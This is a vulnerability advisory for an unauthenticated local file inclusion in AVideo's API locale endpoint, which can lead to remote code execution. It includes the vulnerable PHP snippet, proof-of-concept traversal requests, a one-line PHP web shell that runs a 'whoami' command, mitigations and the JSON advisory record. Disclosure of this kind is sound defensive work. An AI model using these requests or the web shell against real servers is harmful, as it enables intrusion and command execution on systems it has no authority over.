GHSA-8FW8-Q79C-FP9M

Vulnerability from github – Published: 2026-03-20 21:55 – Updated: 2026-03-25 20:44
VLAI?
Summary
AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
Details

Summary

An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.

Details

  • Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck']=1 and merges GET/POST/JSON into $parameters without authentication or API secret.
  • Handler: plugin/API/API.php, method get_api_locale() (lines ~5009–5023): php $parameters['language'] = strtolower($parameters['language']); $file = "{$global['systemRootPath']}locale/{$parameters['language']}.php"; if (!file_exists($file)) { return new ApiObject("This language does not exists"); } include $file; No validation is performed; ../ traversal is accepted.
  • Because include executes PHP, any reachable PHP file is executed in the web server context.

PoC

  1. Fetch an arbitrary PHP file (no auth): GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1 Host: <target> Response returns the rendered About page HTML, proving traversal outside locale/.
  2. RCE with an attacker PHP file (any writable PHP path): GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.

Impact

  • Unauthenticated file inclusion of arbitrary PHP files under the web root.
  • Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
  • Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
  • Affects any deployment with the API plugin enabled (default in docker-compose).

Mitigation

  • Reject path separators/dots and enforce a strict allowlist of locale slugs.
  • realpath the target and ensure it stays within $systemRootPath/locale.
  • Stop using include for translations; load data from vetted formats (JSON/array).
  • Add authentication (API secret/token) to the endpoint as a secondary control.
Severity ?
8.6 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T21:55:31Z",
    "nvd_published_at": "2026-03-23T19:16:40Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. \n### Details\n- Entry point: `plugin/API/get.json.php` sets `$global[\u0027bypassSameDomainCheck\u0027]=1` and merges GET/POST/JSON into `$parameters` without authentication or API secret.\n- Handler: `plugin/API/API.php`, method `get_api_locale()` (lines ~5009\u20135023):\n  ```php\n  $parameters[\u0027language\u0027] = strtolower($parameters[\u0027language\u0027]);\n  $file = \"{$global[\u0027systemRootPath\u0027]}locale/{$parameters[\u0027language\u0027]}.php\";\n  if (!file_exists($file)) { return new ApiObject(\"This language does not exists\"); }\n  include $file;\n  ```\n  No validation is performed; `../` traversal is accepted.\n- Because `include` executes PHP, any reachable PHP file is executed in the web server context.\n\n### PoC\n1. Fetch an arbitrary PHP file (no auth):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale\u0026language=../view/about HTTP/1.1\n   Host: \u003ctarget\u003e\n   ```\n   Response returns the rendered About page HTML, proving traversal outside `locale/`.\n2. RCE with an attacker PHP file (any writable PHP path):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale\u0026language=../videos/locale/shell\u0026x=whoami\n   ```\n   If `shell.php` contains `\u003c?php system($_GET[\u0027x\u0027]); ?\u003e`, the response includes command output.\n\n### Impact\n- Unauthenticated file inclusion of arbitrary PHP files under the web root.\n- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.\n- Potential RCE *if* any attacker-writable PHP file exists elsewhere (not confirmed in this build).\n- Affects any deployment with the API plugin enabled (default in docker-compose).\n\n### Mitigation\n- Reject path separators/dots and enforce a strict allowlist of locale slugs.\n- `realpath` the target and ensure it stays within `$systemRootPath/locale`.\n- Stop using `include` for translations; load data from vetted formats (JSON/array).\n- Add authentication (API secret/token) to the endpoint as a secondary control.",
  "id": "GHSA-8fw8-q79c-fp9m",
  "modified": "2026-03-25T20:44:38Z",
  "published": "2026-03-20T21:55:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33513"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.